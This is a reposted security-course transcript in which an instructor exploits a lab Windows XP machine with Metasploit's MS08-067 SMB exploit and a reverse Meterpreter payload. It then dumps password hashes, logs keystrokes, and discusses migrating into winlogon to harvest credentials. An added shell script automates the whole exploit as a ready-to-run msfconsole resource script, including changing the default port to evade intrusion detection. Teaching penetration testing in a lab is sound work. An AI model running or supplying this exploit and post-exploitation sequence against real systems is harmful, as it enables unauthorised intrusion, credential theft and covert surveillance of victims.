Unit 4: Exploits and Exploiting
4.1 Exploits and Exploiting
Exploit Demos 1

Starting Metasploit

>> It's time to enter the world of MSF, the Metasploit Framework.
I fired up my Kali VM once again and opened up a terminal.
First I started the PostgreSQL database service.
PostgreSQL is an open source relational DBMS, database management system, used by Metasploit.
After that, I created and initialized the Metasploit Framework database
with the command msfdb init.
You'll only enter this command the first time you go through these steps.
Subsequently, it will be msfdb start instead of msfdb init.
Finally, it's time to run msfconsole, the most popular interface to the Metasploit Framework.
It's an all-in-one centralized console that allows you
to efficiently access the MSF options.
I'm going to run this in a second terminal.
MSF runs in its own environment,
and I like having a bash shell prompt handy just in case I need it.
[ Silence ]
After a little bit, you'll see the MSF prompt.
Each time you load MSF, you'll see a different cute and funny text display.


Exploit and Payload Demo

>> I've opened up a second instance of VMware Workstation Player
with good ol' Windows XP as the VM.
Like my Kali box, my Windows XP box is in bridged mode.
Therefore, my Windows host machine, my Kali VM
and my Windows XP VM are all on the same subnet.
I brought Nmap right into the mix.
-A (upper case A) performs tons of tests on the target IP address, including OS detection,
version detection, script scanning and traceroute.
-v (lower case v) specifies that we want verbose output.
[silence]
Notice, towards the bottom of the output, there are lines regarding SMB,
Server Message Block, security on the XP machine.
SMB allows for sharing of files and printers.
Furthermore, port 445, used for directly hosted SMB over TCP/IP, is open.
Let's see all exploits associated with SMB vulnerabilities.
[silence]
Let's zone in on one of the most famous exploits of all time.
[silence]
Great. Let's use it.
You'll notice that the prompt changes to a specific exploit prompt.
Let's understand where we are.
We've identified a vulnerability of SMB on the target machine.
We've selected the MS08-067 NetAPI exploit.
Now, we need a payload.
[silence]
Let's zone in on my favorite one.
[silence]
Let's use it.
Using this payload, we're going to get the victim machine
to initiate a TCP connection back to us.
That's much better than an unsolicited connection coming into the victim machine
from an unknown IP address, which would be flagged by a firewall, IDS or IPS.
Now, we need to configure the exploit.
[silence]
Show targets will give you a list of all the targets that this exploit works for.
[silence]
Based on the output from Nmap earlier, I'll type set target 2.
Keeping the default of target zero, automatic targeting is fine as well.
Let's see the options again.
[silence]
Let's set the remote host with the IP address of my Windows XP box.
[silence]
Let's set the local host using the IP address of this Kali box.
Show options, again, verifies our settings.
We could change the local port from 4444 to avoid detection, since an IDS will almost certainly know
about Metasploit's use of port 4444.
But we'll just leave it for now.
Ready to exploit?
Bam.
We're in. We now own the XP box.
What could we do here?
Let's take a look.
[silence]
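The msfconsole sequence from this demo, gathered into a Metasploit resource script so the same session can be replayed instead of typed command by command. This is an added example, not part of the original transcript or the course materials. The 192.168.1.x addresses and port 8443 are placeholders standing in for the demo's XP and Kali boxes; the module and option names are the current Metasploit ones (RHOSTS is spelled RHOST on older framework versions), and the scan goes through db_nmap so its results land in the database that msfdb init created.

```shell
#!/bin/sh
# Added example (not from the course): build an msfconsole resource script
# that reproduces the demo's session, then run it if msfconsole is installed.
set -eu

# Accept only a dotted-quad IPv4 address so a typo in the target never turns
# into a scan or exploit attempt against some other host.
is_ipv4() {
  saved_ifs=$IFS
  IFS=.
  set -- $1
  IFS=$saved_ifs
  [ $# -eq 4 ] || return 1
  for octet in "$@"; do
    case $octet in ''|*[!0-9]*) return 1 ;; esac
    [ "$octet" -le 255 ] || return 1
  done
}

# write_rc TARGET LHOST LPORT OUTFILE
# Writes the resource script for the MS08-067 / reverse_tcp Meterpreter
# session shown in the demo. Fails (exit 1) on malformed inputs.
write_rc() {
  target=$1; lhost=$2; lport=$3; out=$4
  is_ipv4 "$target" || { echo "bad RHOSTS: $target" >&2; return 1; }
  is_ipv4 "$lhost"  || { echo "bad LHOST: $lhost" >&2; return 1; }
  case $lport in ''|*[!0-9]*) echo "bad LPORT: $lport" >&2; return 1 ;; esac
  [ "$lport" -ge 1 ] && [ "$lport" -le 65535 ] || { echo "bad LPORT: $lport" >&2; return 1; }
  cat > "$out" <<EOF
# Same nmap -A -v scan as the demo, but stored in the MSF database.
db_nmap -A -v $target
use exploit/windows/smb/ms08_067_netapi
# Reverse payload: the victim connects back to us, as the demo explains.
set PAYLOAD windows/meterpreter/reverse_tcp
set RHOSTS $target
set LHOST $lhost
# Not the well-known 4444 that the demo leaves in place.
set LPORT $lport
# TARGET stays at 0 (automatic targeting), which the demo says is fine.
check
exploit -j
EOF
}

# Usage: sh ms08_067_rc.sh TARGET LHOST LPORT
# (ms08_067_rc.sh is an assumed file name for this script.)
if [ $# -eq 3 ]; then
  rc=./ms08_067.rc
  write_rc "$1" "$2" "$3" "$rc"
  if command -v msfconsole >/dev/null 2>&1; then
    msfconsole -q -r "$rc"
  else
    echo "wrote $rc; run it with: msfconsole -q -r $rc"
  fi
fi
```

After `exploit -j` the session runs as a background job; `sessions -i 1` drops into the Meterpreter prompt that the next demo uses. `check` is run first so the module reports whether the target looks vulnerable before anything is sent.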


Meterpreter Demo

>> Let's take a look at some cool Meterpreter commands.
sysinfo.
Now we've got some information about the compromised system.
hashdump.
Ahh! Now you can use these hashes in a brute force attack,
a dictionary attack, or a rainbow table attack.
idletime. It's been this long since there were hands on a keyboard of the compromised system.
This information could be helpful in determining
if an attacker should be daring now or wait a little bit.
ps, a list of every running process on the compromised system.
kill,
in this case with a process ID of 1364.
Do you see the Windows command line interface on the Windows XP system?
No, you don't.
Poof. It's gone.
[ Silence ]
migrate.
Meterpreter's migrate command allows us to move our running code into a process
that has interactive access to the compromised system.
The running payload will be migrated into the explorer.exe process when I specify 1608.
This explorer.exe process is owned by the active user.
Now we can use keyscan_start --
-- to log every single one of the user's keystrokes, including the arrow keys,
the backspace key, the delete key, and more.
If we wanted to capture system login information,
we'd migrate to the winlogon process, which will capture the credentials
of all users logging into the system.
This is dependent, of course, on the machine being in a running state.
Rebooting or shutting down the compromised system would end our Meterpreter session.
[ Silence ]
keyscan_dump.
There it is.
[ Silence ]
Let's sign in to edX.
[ Silence ]
Let's sign in to my courses.
[ Silence ]
Let's check our Gmail.
[ Silence ]
It's all there.
[ Silence ]
keyscan_stop.
shell pops up a Windows command line interface within Meterpreter.
We can execute networking commands.
[ Silence ]
Yes! I'm actually sending pings from the compromised Windows XP system.
We can execute file system commands.
We just made a directory.
[ Silence ]
We just made a file.
[ Silence ]
We just deleted a file.
We just removed a directory.

Reposted from: https://www.cnblogs.com/sec875/articles/10028516.html